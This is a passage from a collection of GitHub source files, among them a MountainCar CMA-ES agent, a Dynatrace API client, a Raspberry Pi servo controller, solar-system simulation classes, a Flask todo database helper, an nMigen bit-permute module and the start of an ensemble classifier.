list([0., 0., 2., 0., 0., 2., 2., 2., 2., 0., 2., 1., 0., 0., 0., 2., 1.,\n 0., 1., 2.])])\n # We can start from scratch by un commenting the following line:\n # self.policy = np.zeros(shape=(self.positions.shape[0], self.velocities.shape[0]))\n # We define the initial solution for our cma-es\n self.init = self.policy.reshape(self.positions.shape[0]*self.velocities.shape[0])\n self.b_policy = None\n self.train() # Do not remove this line!!\n\n\n def train(self):\n\n \"\"\"\n Learn your (final) policy.\n\n Use evolution strategy algortihm CMA-ES: https://pypi.org/project/cma/\n\n Possible action: [0, 1, 2]\n Range observation (tuple):\n - position: [-1.2, 0.6]\n - velocity: [-0.07, 0.07]\n \"\"\"\n def policy_action(position, velocity, policy):\n '''Fonction that returns the action given a state and a policy'''\n i_position, i_velocity = get_discretized_env(position, velocity)\n # print(i_position, i_velocity)\n action = policy[i_position][i_velocity]\n return action\n\n def get_discretized_env(position, velocity, velocities=self.velocities, positions=self.positions):\n '''Fonction that give the indices to look for in the discretized position and velocity space'''\n i = 0\n while velocity > velocities[i]:\n i += 1\n velocity_index = i\n j = 0\n while position > positions[j]:\n j += 1\n position_index = j\n return position_index, velocity_index\n\n env = Environment()\n\n # For debug purposes\n self.min_value = 999999999\n\n def obj_function(policy):\n ''' Fonction that takes a policy and run it on 200 steps of the environement. It returns the fitness of the policy.\n '''\n env.reset()\n iter_counter = 0\n x = policy.reshape(self.positions.shape[0]*self.velocities.shape[0], -1)\n x = np.floor(x)\n d_policy = x.reshape(self.positions.shape[0], self.velocities.shape[0])\n\n distances = []\n distance_mid = []\n energy = []\n malus = 200\n\n for i in range(200):\n # env.render()\n # We take an action according to the given policy\n position, velocity = env.state\n distances.append(np.absolute(0.6 - position))\n distance_mid.append(np.absolute(-0.56 - position))\n energy.append(0.5*(velocity**2))\n if position == 0.6:\n # If we enter here we won the game\n malus = (i / 200) * 200\n value = -sum(distance_mid) -max(energy) + malus + min(distances)*50 - (np.absolute(min(distances) - max(distances))*100)\n\n # For debug purposes :\n if value < self.min_value:\n self.min_value = value\n print('New best value = '+str(self.min_value))\n return value\n action = policy_action(position, velocity, d_policy)\n _, _ = env.act(int(np.floor(action)))\n\n value = -sum(distance_mid)-max(energy) + malus + min(distances)*50 -(np.absolute(min(distances) - max(distances))*100)\n # For debug purposes :\n if value < self.min_value:\n self.min_value = value\n print('New best value = '+str(self.min_value))\n return value\n\n # We launch a cma-es to find a policy that minimizes the ojective function value\n # We decided to fix the ftarget value so it doest take too long too run but we could remove it\n # to optimize the function even more\n best_policy, _ = cma.fmin2(obj_function, self.init, 2,{\n #'BoundaryHandler': 'BoundPenalty',\n 'BoundaryHandler': 'BoundTransform',\n 'bounds':[0,3],\n 'verbose':1,\n 'ftarget':-100,\n 'seed': 237591\n })\n print(\"Optimization FINISHED\")\n #self.policy = best_policy\n self.b_policy = best_policy\n self.policy = np.floor(best_policy).reshape(self.positions.shape[0], self.velocities.shape[0])\n print(\"Best Policy updated\"+str(self.policy))\n\n def act(self, observation):\n \"\"\"\n Acts given an observation of the environment (using learned policy).\n\n Takes as argument an observation of the current state, and\n returns the chosen action.\n See environment documentation: https://github.com/openai/gym/wiki/MountainCar-v0\n Possible action: [0, 1, 2]\n Range observation (tuple):\n - position: [-1.2, 0.6]\n - velocity: [-0.07, 0.07]\n \"\"\"\n\n def policy_action(position, velocity, policy):\n i_position, i_velocity = get_discretized_env(position, velocity)\n # print(i_position, i_velocity)\n\n action = policy[i_position][i_velocity]\n # print(\"Velocity : %f\"%velocity)\n # print(\"Next Action %d, %d ----> %d\"%(i_position, i_velocity, action))\n return action\n\n def get_discretized_env(position, velocity, velocities=self.velocities, positions=self.positions):\n i = 0\n while velocity > velocities[i]:\n i += 1\n velocity_index = i\n j = 0\n while position > positions[j]:\n j += 1\n position_index = j\n return position_index, velocity_index\n\n # Once the training is finished we simply follow the best policy cma could find\n x = self.b_policy.reshape(self.positions.shape[0]*self.velocities.shape[0], -1)\n x = np.floor(x)\n d_policy = x.reshape(self.positions.shape[0], self.velocities.shape[0])\n\n action = policy_action(observation[0], observation[1], d_policy)\n action = (int(np.floor(action)))\n\n return action\n\nAgent = Patrick\n","repo_name":"Nchlt/MountainCar","sub_path":"agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":7257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"71239484446","text":"import json\nimport logging\n\nimport requests\n\ndefault_logger = logging.getLogger(__name__)\n\n\nclass DynatraceAPI:\n def __init__(self, url: str, token: str, logger=default_logger):\n self.base_url = url\n self._auth = {\"Authorization\": f\"Api-Token {token}\"}\n self.logger = logger\n\n def _make_request(self, path, params=None, method=\"GET\"):\n url = f\"{self.base_url}{path}\"\n self.logger.debug(f\"Calling {url} with params: {params}\")\n if method == \"GET\":\n r = requests.request(method, url, params=params, headers=self._auth)\n else:\n r = requests.request(method, url, json=params, headers=self._auth)\n self.logger.debug(f\"Got response: {r} from {url}\")\n if r.status_code >= 300:\n self.logger.error(f\"Error making request: {r.text}\")\n return r.json()\n\n def metrics_descriptors(self):\n path = \"/api/v2/metrics/descriptors\"\n return self._make_request(path)\n\n def metrics_series(\n self, selector, resolution=None, date_from=None, date_to=None, next_page_key=None, page_size=None, scope=None, entitySelector=None\n ):\n path = f\"/api/v2/metrics/query\"\n params = {\n \"metricSelector\": selector,\n \"resolution\": resolution,\n \"from\": date_from,\n \"to\": date_to,\n \"nextPageKey\": next_page_key,\n \"pageSize\": page_size,\n \"scope\": scope,\n \"entitySelector\": entitySelector\n }\n self.logger.debug(f\"Calling {path} with params {params}\")\n return self._make_request(path, params=params)\n\n def synthetic_monitors(self):\n path = \"/api/v1/synthetic/monitors\"\n return self._make_request(path)\n\n def synthetic_monitor(self, monitor_id):\n path = f\"/api/v1/synthetic/monitors/{monitor_id}\"\n return self._make_request(path)\n\n def timeseries(\n self,\n identifier,\n include_data: bool = False,\n aggregation=None,\n start_timestamp=None,\n end_timestamp=None,\n predict=False,\n relative_time=None,\n query_mode=\"SERIES\",\n entities=None,\n tag=None,\n percentile=None,\n include_parents_ids=False,\n consider_maintenance=False,\n ):\n path = f\"/api/v1/timeseries/{identifier}\"\n params = {\n \"includeData\": include_data,\n \"aggregationType\": aggregation,\n \"startTimestamp\": start_timestamp,\n \"endTimestamp\": end_timestamp,\n \"predict\": predict,\n \"relativeTime\": relative_time,\n \"queryMode\": query_mode,\n \"entities\": entities,\n \"tag\": tag,\n \"percentile\": percentile,\n \"includeParentIds\": include_parents_ids,\n \"considerMaintenanceWindowsForAvailability\": consider_maintenance,\n }\n return self._make_request(path, params, method=\"POST\")\n\n\ndef main():\n\n with open(\"config.json\", \"r\") as f:\n config = json.load(f)\n d = DynatraceAPI(config[\"dynatrace_base_url\"], config[\"dynatrace_token\"])\n\n from pprint import pformat\n\n # print(pformat(d.synthetic_monitor(\"HTTP_CHECK-4A8FA7A3BD1C6C64\"), indent=2))\n\n for metric, details in d.metrics_series(\"builtin:synthetic.browser.event.failure:names\", date_from=\"now-5m\")[\n \"metrics\"\n ].items():\n for serie in details[\"series\"]:\n print(serie)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dlopes7/dynatrace-csv-wrapper","sub_path":"classicwrapper/dynatrace_api.py","file_name":"dynatrace_api.py","file_ext":"py","file_size_in_byte":3470,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"33881622864","text":"\ntry:\n import RPIO\n RPIO_IS_PRESENT = True\nexcept ImportError:\n print('RPIO not installed. Will simulate behavior.')\n RPIO_IS_PRESENT = False\n\nfrom configuration import SERVO\nimport threading\nimport time\n\ncurrent_servo_position = None\n\nif RPIO_IS_PRESENT:\n servo = None\n def init_servo():\n global servo\n if servo is not None:\n return\n import signal\n\n # PWM traps all signals\n # see https://github.com/metachris/RPIO/issues/15\n # save the signals\n saved_signals = {}\n for s in dir(signal):\n if s.startswith('SIG') and not s.startswith('SIG_'):\n si = getattr(signal, s)\n saved_signals[si] = signal.getsignal(si)\n from RPIO import PWM\n # http://pythonhosted.org/RPIO/pwm_py.html\n servo = PWM.Servo()\n # restore the signals\n for si, h in saved_signals.items():\n if si in (9, 19):\n continue\n signal.signal(si, h)\n\n servo_lock = threading.Lock()\n\n def _set_servo_position(degrees):\n global current_servo_position\n if current_servo_position == degrees:\n return\n init_servo()\n # compute pulse width\n degrees = degrees % 360\n if degrees > SERVO.ROTATIONAL_RANGE:\n degrees = SERVO.ROTATIONAL_RANGE\n pulse_width = SERVO.PULSE_WIDTH_MIN + \\\n (SERVO.PULSE_WIDTH_MAX - SERVO.PULSE_WIDTH_MIN) * degrees \\\n / SERVO.ROTATIONAL_RANGE\n\n # pulse the servo\n with servo_lock:\n servo.set_servo(SERVO.PIN, int(pulse_width * 100000) * 10)\n current_servo_position = degrees\n\nelse:\n def _set_servo_position(degrees):\n global current_servo_position\n print('set servo position to {}°.'.format(int(degrees)))\n current_servo_position = degrees\n\nwanted_servo_position = None\n\ndef set_servo_position(degrees):\n global wanted_servo_position\n wanted_servo_position = degrees\n return time_to_arrive()\n\ndef time_to_arrive():\n if current_servo_position is None or wanted_servo_position is None:\n return SERVO.ROTATIONAL_RANGE * \\\n SERVO.MOVEMENT_SPEED_IN_SECONDS_PER_DEGREES * \\\n servo_velocity_multiplier\n return abs(wanted_servo_position - current_servo_position) * \\\n SERVO.MOVEMENT_SPEED_IN_SECONDS_PER_DEGREES * \\\n servo_velocity_multiplier\n\ndef set_servo_to_middle():\n set_servo_position(SERVO.ROTATIONAL_RANGE / 2)\n\nservo_velocity_multiplier = SERVO.DEFAULT_VELOCITY_MULTIPLIER\n\ndef set_servo_velocity(velocity_multiplier):\n global servo_velocity_multiplier\n velocity_multiplier = float(velocity_multiplier)\n if velocity_multiplier < SERVO.MINIMUM_VELOCITY_MULTIPLIER:\n velocity_multiplier = SERVO.MINIMUM_VELOCITY_MULTIPLIER\n elif velocity_multiplier > SERVO.MAXIMUM_VELOCITY_MULTIPLIER:\n velocity_multiplier = SERVO.MAXIMUM_VELOCITY_MULTIPLIER\n servo_velocity_multiplier = velocity_multiplier\n return servo_velocity_multiplier\n\nIDLE_SLEEP_TIME = 0.01\n\ndef servo_move_loop():\n while 1:\n # wait for servo to arrive\n time.sleep(SERVO.REACTION_TIME_FOR_NEW_POSITION_IN_SECONDS)\n # test if the parameters are valid\n if wanted_servo_position is None:\n continue\n if current_servo_position is None:\n _set_servo_position(wanted_servo_position)\n continue\n # conpute the the step size in degrees\n # for the movement within the reaction time\n step_size = SERVO.REACTION_TIME_FOR_NEW_POSITION_IN_SECONDS / \\\n SERVO.MOVEMENT_SPEED_IN_SECONDS_PER_DEGREES / \\\n servo_velocity_multiplier\n if wanted_servo_position < current_servo_position - step_size:\n step = -step_size\n elif wanted_servo_position > current_servo_position + step_size:\n step = step_size\n else:\n step = wanted_servo_position - current_servo_position\n _set_servo_position(current_servo_position + step)\n\n__all__ = ['set_servo_position', 'set_servo_to_middle', 'RPIO_IS_PRESENT', \\\n 'set_servo_velocity', 'servo_move_loop']\n","repo_name":"niccokunzmann/rustyrobots","sub_path":"roedel/raspberrypi/robot/servo_control.py","file_name":"servo_control.py","file_ext":"py","file_size_in_byte":4224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"15689397768","text":"from scipy.spatial.distance import cdist\r\nimport numpy as np\r\n\r\n\r\ndef geometrical_separability_index(matrix, labels):\r\n size = len(labels)\r\n distances = cdist(matrix, matrix)\r\n positions = distances.argsort(axis=0)\r\n elements = np.take(labels, positions)\r\n reference_points = elements[0]\r\n nearest_neighbours = elements[1]\r\n gsi = np.sum(reference_points == nearest_neighbours) / size\r\n return gsi\r\n","repo_name":"aacevedot/gsindex","sub_path":"src/gsindex.py","file_name":"gsindex.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"86"} +{"seq_id":"12700267078","text":"import math\nimport random\n\nfrom constants import \\\n Color, OrbitTime, Radius, OrbitalRadius, BodyName, CelestialBodyType\nfrom utils import \\\n km_to_pixels, au_to_pixels, get_sun_scale_radius, get_planet_scale_radius\n\n\nclass CelestialBody(object):\n\n def __init__(self):\n self.type = CelestialBodyType.CELESTIAL_BODY\n\n # Draw values\n self.x = 0\n self.y = 0\n self.color = (0, 0, 0)\n self.preselected = False\n self.visible = True\n\n # Data values\n self.radius = 0\n self.name = \"\"\n\n\nclass Star(CelestialBody):\n\n def __init__(self):\n CelestialBody.__init__(self)\n\n self.type = CelestialBodyType.STAR\n self.planets = []\n\n\nclass OrbitCelestialBody(CelestialBody):\n\n def __init__(self, around_the=None):\n CelestialBody.__init__(self)\n\n self.angle = random.randint(0, 359)\n self.orbit_time = 0\n self.orbital_radius = 0\n self.around_the = around_the\n\n def calculate_position(self, width, height, zoom):\n pass\n\n def advance(self, speed):\n self.angle += 360.0 / self.orbit_time * speed\n\n if self.angle >= 360:\n self.angle -= 360\n\n\nclass NaturalSatellite(OrbitCelestialBody):\n\n def __init__(self, planet=None):\n OrbitCelestialBody.__init__(self, around_the=planet)\n\n self.type = CelestialBodyType.NATURAL_SATELLITE\n\n def calculate_position(self, width, height, zoom):\n radius = km_to_pixels(width, height, self.radius, zoom)\n distance = au_to_pixels(\n width, height, self.orbital_radius, zoom)\n distance += get_planet_scale_radius(\n width, height, self.around_the, zoom)\n distance += radius * 2 + zoom\n self.x = distance * math.sin(self.angle * math.pi / 180.0)\n self.y = distance * math.cos(self.angle * math.pi / 180.0)\n\n\nclass Planet(OrbitCelestialBody):\n\n def __init__(self, star=None):\n OrbitCelestialBody.__init__(self, around_the=star)\n\n self.type = CelestialBodyType.PLANET\n self.natural_satellites = []\n\n def calculate_position(self, width, height, zoom):\n radius = km_to_pixels(width, height, self.radius, zoom)\n distance = au_to_pixels(\n width, height, self.orbital_radius, zoom)\n distance += get_sun_scale_radius(\n width, height, zoom) + radius\n self.x = distance * math.sin(self.angle * math.pi / 180.0)\n self.y = distance * math.cos(self.angle * math.pi / 180.0)\n\n\nclass Moon(NaturalSatellite):\n\n def __init__(self, earth=None):\n NaturalSatellite.__init__(self, planet=earth)\n\n self.type = CelestialBodyType.MOON\n self.color = Color.MOON\n self.orbit_time = OrbitTime.MOON\n self.radius = Radius.MOON\n self.orbital_radius = OrbitalRadius.MOON\n self.name = BodyName.MOON\n\n\nclass Fobos(NaturalSatellite):\n\n def __init__(self, mars=None):\n NaturalSatellite.__init__(self, planet=mars)\n\n self.type = CelestialBodyType.FOBOS\n self.color = Color.FOBOS\n self.orbit_time = OrbitTime.FOBOS\n self.radius = Radius.FOBOS\n self.orbital_radius = OrbitalRadius.FOBOS\n self.name = BodyName.FOBOS\n\n\nclass Deimos(NaturalSatellite):\n\n def __init__(self, mars=None):\n NaturalSatellite.__init__(self, planet=mars)\n\n self.type = CelestialBodyType.DEIMOS\n self.color = Color.DEIMOS\n self.orbit_time = OrbitTime.DEIMOS\n self.radius = Radius.DEIMOS\n self.orbital_radius = OrbitalRadius.DEIMOS\n self.name = BodyName.DEIMOS\n\n\nclass Io(NaturalSatellite):\n\n def __init__(self, jupiter=None):\n NaturalSatellite.__init__(self, planet=jupiter)\n\n self.type = CelestialBodyType.IO\n self.color = Color.IO\n self.orbit_time = OrbitTime.IO\n self.radius = Radius.IO\n self.orbital_radius = OrbitalRadius.IO\n self.name = BodyName.IO\n\n\nclass Europa(NaturalSatellite):\n\n def __init__(self, jupiter=None):\n NaturalSatellite.__init__(self, planet=jupiter)\n\n self.type = CelestialBodyType.EUROPA\n self.color = Color.EUROPA\n self.orbit_time = OrbitTime.EUROPA\n self.radius = Radius.EUROPA\n self.orbital_radius = OrbitalRadius.EUROPA\n self.name = BodyName.EUROPA\n\n\nclass Ganymede(NaturalSatellite):\n\n def __init__(self, jupiter=None):\n NaturalSatellite.__init__(self, planet=jupiter)\n\n self.type = CelestialBodyType.GANYMEDE\n self.color = Color.GANYMEDE\n self.orbit_time = OrbitTime.GANYMEDE\n self.radius = Radius.GANYMEDE\n self.orbital_radius = OrbitalRadius.GANYMEDE\n self.name = BodyName.GANYMEDE\n\n\nclass Callisto(NaturalSatellite):\n\n def __init__(self, jupiter=None):\n NaturalSatellite.__init__(self, planet=jupiter)\n\n self.type = CelestialBodyType.CALLISTO\n self.color = Color.CALLISTO\n self.orbit_time = OrbitTime.CALLISTO\n self.radius = Radius.CALLISTO\n self.orbital_radius = OrbitalRadius.CALLISTO\n self.name = BodyName.CALLISTO\n\n\nclass Mercury(Planet):\n\n def __init__(self, sun=None):\n Planet.__init__(self, star=sun)\n\n self.type = CelestialBodyType.MERCURY\n self.color = Color.MERCURY\n self.orbit_time = OrbitTime.MERCURY\n self.radius = Radius.MERCURY\n self.orbital_radius = OrbitalRadius.MERCURY\n self.name = BodyName.MERCURY\n\n\nclass Venus(Planet):\n\n def __init__(self, sun=None):\n Planet.__init__(self, star=sun)\n\n self.type = CelestialBodyType.VENUS\n self.color = Color.VENUS\n self.orbit_time = OrbitTime.VENUS\n self.radius = Radius.VENUS\n self.orbital_radius = OrbitalRadius.VENUS\n self.name = BodyName.VENUS\n\n\nclass Earth(Planet):\n\n def __init__(self, sun=None):\n Planet.__init__(self, star=sun)\n\n self.type = CelestialBodyType.EARTH\n self.color = Color.EARTH\n self.orbit_time = OrbitTime.EARTH\n self.radius = Radius.EARTH\n self.orbital_radius = OrbitalRadius.EARTH\n self.natural_satellites = [Moon(self)]\n self.name = BodyName.EARTH\n\n\nclass Mars(Planet):\n\n def __init__(self, sun=None):\n Planet.__init__(self, star=sun)\n\n self.type = CelestialBodyType.MARS\n self.color = Color.MARS\n self.orbit_time = OrbitTime.MARS\n self.radius = Radius.MARS\n self.orbital_radius = OrbitalRadius.MARS\n self.natural_satellites = [Fobos(self), Deimos(self)]\n self.name = BodyName.MARS\n\n\nclass Jupiter(Planet):\n\n def __init__(self, sun=None):\n Planet.__init__(self, star=sun)\n\n self.type = CelestialBodyType.JUPITER\n self.color = Color.JUPITER\n self.orbit_time = OrbitTime.JUPITER\n self.radius = Radius.JUPITER\n self.orbital_radius = OrbitalRadius.JUPITER\n self.natural_satellites = [\n Io(self), Europa(self), Ganymede(self), Callisto(self)]\n self.name = BodyName.JUPITER\n\n\nclass Saturn(Planet):\n\n def __init__(self, sun=None):\n Planet.__init__(self, star=sun)\n\n self.type = CelestialBodyType.SATURN\n self.color = Color.SATURN\n self.orbit_time = OrbitTime.SATURN\n self.radius = Radius.SATURN\n self.orbital_radius = OrbitalRadius.SATURN\n self.name = BodyName.SATURN\n\n\nclass Uranus(Planet):\n\n def __init__(self, sun=None):\n Planet.__init__(self, star=sun)\n\n self.type = CelestialBodyType.URANUS\n self.color = Color.URANUS\n self.orbit_time = OrbitTime.URANUS\n self.radius = Radius.URANUS\n self.orbital_radius = OrbitalRadius.URANUS\n self.name = BodyName.URANUS\n\n\nclass Neptune(Planet):\n\n def __init__(self, sun=None):\n Planet.__init__(self, star=sun)\n\n self.type = CelestialBodyType.NEPTUNE\n self.color = Color.NEPTUNE\n self.orbit_time = OrbitTime.NEPTUNE\n self.radius = Radius.NEPTUNE\n self.orbital_radius = OrbitalRadius.NEPTUNE\n self.name = BodyName.NEPTUNE\n\n\nclass Sun(Star):\n\n def __init__(self):\n Star.__init__(self)\n\n self.type = CelestialBodyType.SUN\n self.color = Color.SUN\n self.radius = Radius.SUN\n self.name = BodyName.SUN\n\n self.planets = [\n Mercury(self),\n Venus(self),\n Earth(self),\n Mars(self),\n Jupiter(self),\n Saturn(self),\n Uranus(self),\n Neptune(self)\n ]\n","repo_name":"sugarlabs/solar-system","sub_path":"celestial_bodies.py","file_name":"celestial_bodies.py","file_ext":"py","file_size_in_byte":8517,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"86"} +{"seq_id":"32186546318","text":"from setuptools import find_packages, setup\n\nwith open('requirements/requirements.in') as f:\n REQUIREMENTS = [\n item\n for item in f.read().splitlines()\n if item.strip() and not item.startswith('--extra')\n ]\n\nwith open('VERSION') as f:\n VERSION = f.readline().strip()\n\nsetup(\n name='patients.dbmodels',\n version=VERSION,\n # url='http://127.0.0.1:8000',\n # download_url='http://127.0.0.1:8000',\n author='radovanlapar',\n author_email='laparradovan@gmail.com',\n packages=find_packages(),\n install_requires=REQUIREMENTS,\n tests_require=REQUIREMENTS,\n include_package_data=True,\n classifiers=[\n 'Private :: Do Not Upload',\n 'Environment :: Console',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3 :: Only',\n ],\n)\n","repo_name":"rlapar/patients","sub_path":"dbmodels/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"4860619789","text":"'''\n我们可以用2*1的小矩形横着或者竖着去覆盖更大的矩形。请问用n个2*1的小矩形无重叠地覆盖一个2*n的大矩形,总共有多少种方法?\n'''\n'''\n本题就是斐波那契数列的变形,对于我们去填充一个大矩形,如果我们第一步选择竖向填充,则等于number - 1的种数,如果第一步\n选择横向填充,显然,最终的结果等于number - 2的种数\n'''\n'''\n总结: 递归的关键在于确定怎么一个大问题拆分成若干个小问题,本题的关键在于如何将大问题拆分成若干个小问题,本题的巧妙之处\n就在于我们首先看第一步我们怎么弄,然后根据第一步的操作来确定递归的递推公式。\n'''\n\nclass Solution:\n def rectCover(self, number):\n # if number == 0:\n # return 0\n # if number == 1:\n # return 1\n # if number == 2:\n # return 2\n # return self.rectCover(number - 1) + self.rectCover(number - 2)\n # 非递归\n if number == 0:\n return 0\n if number == 1:\n return 1\n if number == 2:\n return 2\n table = [0 for i in range(number+1)]\n table[1] = 1\n table[2] = 2\n for i in range(3,number+1):\n table[i] = table[i-1] + table[i-2]\n return table[number]\n\n\n\n\nif __name__ == '__main__':\n s = Solution()\n print(s.rectCover(4))\n","repo_name":"ShawnWuzh/algorithms","sub_path":"递归-矩形覆盖.py","file_name":"递归-矩形覆盖.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"32750295051","text":"import time\r\nimport math\r\nimport sqlite3\r\n\r\nclass todoDB:\r\n def __init__(self, db):\r\n self.__db = db\r\n self.__cur = db.cursor()\r\n \r\n def getTodos(self):\r\n sql = \"SELECT * FROM todos\"\r\n try:\r\n self.__cur.execute(sql)\r\n res = self.__cur.fetchall()\r\n if res: return res\r\n except:\r\n print(\"Ошибка чтения из БД1\")\r\n return []\r\n \r\n def getTodo(self, id):\r\n sql = \"SELECT * FROM todos WHERE id = {}\".format(id)\r\n try:\r\n self.__cur.execute(sql)\r\n res = self.__cur.fetchone()\r\n if res: return res\r\n except:\r\n print(\"Ошибка чтения из БД2\")\r\n return []\r\n \r\n def addTodo(self, todo, status):\r\n try:\r\n tm = math.floor(time.time())\r\n created_on = tm\r\n updated_on = tm\r\n self.__cur.execute(\"INSERT INTO todos VALUES(NULL, ? , ?, ?, ?)\", (todo, status, created_on, updated_on))\r\n self.__db.commit()\r\n except sqlite3.Error as e:\r\n print(\"Ошибка добавления статьи в БД: \" + str(e))\r\n return False\r\n return True\r\n \r\n def updateTodo(self, todo, status, id):\r\n try:\r\n updated_on = math.floor(time.time())\r\n self.__cur.execute(\"UPDATE todos SET todo = {}, status = {}, updated_on = {} WHERE id = {}\".format(todo, status, updated_on, id))\r\n self.__db.commit()\r\n except sqlite3.Error as e:\r\n print(\"Ошибка добавления статьи в БД: \" + str(e))\r\n return False\r\n return True","repo_name":"rvladimir001/flask_todos","sub_path":"todoDB.py","file_name":"todoDB.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"69830469405","text":"# coding: utf\n\nPROXIES_API_URL = 'http://localhost:8000/api/proxies/?format=json&' \\\n 'count=%(count)d&' \\\n 'country_code=%(country_code)s'\nPROXY_USE_LIMIT = 20\n\nQUEUE_BACKEND = 'memory'\n\nCACHE_ENABLED = False\nCACHE_DATABASE = 'parsers-cache'\n","repo_name":"hell10w/samsung-apps-parser","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"17484254416","text":"from nmigen import Elaboratable, Signal, Module, Repl, Cat, Const, Array\nfrom nmigen.cli import main\n\n\nclass Bpermd(Elaboratable):\n \"\"\"\n from POWERISA v3.1 p105, chaper 3\n\n This class does a Bit Permute on a Doubleword\n\n permd RA,RS,RB\n\n do i = 0 to 7\n index ← (RS)[8*i:8*i+7]\n If index < 64\n then perm[i] ← (RB)[index]\n else permi[i] ← 0\n RA ←56[0] || perm[0:7]\n\n Eight permuted bits are produced. For each permutedbit i where i\n ranges from 0 to 7 and for each byte i of RS, do the following.\n\n If byte i of RS is less than 64, permuted bit i is set to\n the bit of RB specified by byte i of RS; otherwise\n permuted bit i is set to 0.\n\n The permuted bits are placed in the least-significant byte of RA,\n and the remaining bits are filled with 0s.\n\n Special Registers Altered:\n None\n\n Programming Note:\n\n The fact that the permuted bit is 0 if the corresponding index value\n exceeds 63 permits the permuted bits to be selected from a 128-bit\n quantity, using a single index register. For example, assume that\n the 128-bit quantity Q, from which the permuted bits are to be\n selected, is in registers r2 (high-order 64 bits of Q) and r3\n (low-order 64 bits of Q), that the index values are in register r1,\n with each byte of r1 containing a value in the range 0:127, and that\n each byte of register r4 contains the value 64. The following code\n sequence selects eight permuted bits from Q and places them into\n the low-order byteof r6.\n\n bpermd r6,r1,r2 # select from high-order half of Q\n xor r0,r1,r4 # adjust index values\n bpermd r5,r0,r3 # select from low-order half of Q\n or r6,r6,r5 # merge the two selections\n \"\"\"\n\n def __init__(self, width):\n self.width = width\n self.rs = Signal(width, reset_less=True)\n self.ra = Signal(width, reset_less=True)\n self.rb = Signal(width, reset_less=True)\n\n def elaborate(self, platform):\n m = Module()\n perm = Signal(self.width, reset_less=True)\n rb64 = [Signal(1, reset_less=True, name=f\"rb64_{i}\") for i in range(64)]\n for i in range(64):\n m.d.comb += rb64[i].eq(self.rb[63-i])\n rb64 = Array(rb64)\n for i in range(8):\n index = self.rs[8*i:8*i+8]\n idx = Signal(8, name=f\"idx_{i}\", reset_less=True)\n m.d.comb += idx.eq(index)\n with m.If(idx < 64):\n m.d.comb += perm[i].eq(rb64[idx])\n m.d.comb += self.ra[0:8].eq(perm)\n return m\n\n\nif __name__ == \"__main__\":\n bperm = Bpermd(width=64)\n main(bperm, ports=[bperm.rs, bperm.ra, bperm.rb])\n","repo_name":"ngi-nix/libresoc-soc","sub_path":"src/soc/fu/logical/bpermd.py","file_name":"bpermd.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"86"} +{"seq_id":"33265782330","text":"from collections import defaultdict\nfrom typing import Optional, Any, Dict, List, Tuple, Union\n\nimport numpy as np\nimport tensorflow as tf\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom sklearn.naive_bayes import GaussianNB\nfrom torch import Tensor\nfrom torch.nn import ModuleList\n\nfrom continual_learning.models.custom_layers.differentiable_knn_layer import DKNN\nfrom continual_learning.models.feature_extractors.base import FeatureExtractor\n\n\nclass WeakLearner(nn.Module):\n def __init__(self, input_size: int, output_size: int, tanh_factor: float, device: torch.device):\n super().__init__()\n self.input_size = input_size\n self.output_size = output_size\n self.linear = torch.nn.Linear(input_size, output_size)\n raw_weights_init = tf.keras.initializers.VarianceScaling(scale=1.0, mode='fan_in', distribution='truncated_normal')(shape=(128, input_size, output_size)).numpy()\n single_weak_learner_weights = raw_weights_init[0].transpose(1, 0)\n self.linear.weight.data = torch.Tensor(single_weak_learner_weights)\n self.tanh_factor = tanh_factor\n self.linear.to(device)\n\n def forward(self, x: torch.Tensor):\n raw_input = x.view(x.size(0), -1)\n raw_output = self.linear(raw_input)\n return torch.tanh(raw_output / self.tanh_factor) * self.tanh_factor\n\n\nclass VanillaClassifier(nn.Module):\n def __init__(self, input_size: int, output_size: int, device: torch.device):\n super().__init__()\n self.linear = torch.nn.Linear(input_size, output_size)\n raw_weights_init = tf.keras.initializers.VarianceScaling(scale=0.1, mode='fan_in', distribution='truncated_normal')(shape=(input_size, output_size)).numpy()\n self.linear.weight.data = torch.Tensor(raw_weights_init.transpose(1, 0))\n self.linear.to(device)\n\n def forward(self, x: torch.Tensor):\n raw_input = x.view(x.size(0), -1)\n raw_output = self.linear(raw_input)\n return torch.log_softmax(raw_output, dim=1)\n\n\nclass TanhClassifier(nn.Module):\n def __init__(self, input_size: int, output_size: int, tanh_factor: float, device: torch.device):\n super().__init__()\n self.linear = torch.nn.Linear(input_size, output_size)\n raw_weights_init = tf.keras.initializers.VarianceScaling(scale=0.1, mode='fan_in', distribution='truncated_normal')(shape=(input_size, output_size)).numpy()\n self.linear.weight.data = torch.Tensor(raw_weights_init.transpose(1, 0))\n self.tanh_factor = tanh_factor\n self.linear.to(device)\n\n def forward(self, x: torch.Tensor):\n raw_input = x.view(x.size(0), -1)\n raw_output = self.linear(raw_input)\n return torch.tanh(raw_output / self.tanh_factor) * self.tanh_factor\n\n\nclass EnsembleE2EModule(nn.Module):\n def __init__(\n self,\n encoder: FeatureExtractor,\n input_size: int,\n num_classifiers: int,\n k_neighbors: int,\n learning_rate: float,\n weight_decay: float,\n tanh_factor: float,\n hard_voting: bool,\n trainable_keys: bool,\n num_classes: int,\n classes: 